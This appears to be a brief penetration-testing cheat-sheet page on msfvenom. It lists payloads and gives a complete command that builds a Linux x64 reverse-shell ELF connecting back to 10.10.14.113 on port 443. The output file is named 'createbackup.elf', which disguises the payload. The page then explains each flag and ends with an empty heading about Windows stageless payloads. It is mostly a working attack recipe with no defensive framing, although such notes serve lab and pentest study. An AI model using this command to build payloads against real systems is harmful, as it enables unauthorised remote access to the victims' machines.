MSFVenom

Used to create a payload to help with initial access

List Payloads

msfvenom -l payloads

Build It

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

Call MSFvenom

msfvenom

Creating a Payload

-p 

Choosing the Payload based on Architecture

linux/x64/shell_reverse_tcp 

Address To Connect Back To

LHOST=10.10.14.113 LPORT=443 

Format To Generate Payload In

-f elf 

Output

> createbackup.elf

Building a simple Stageless Payload for a Windows system

Last updated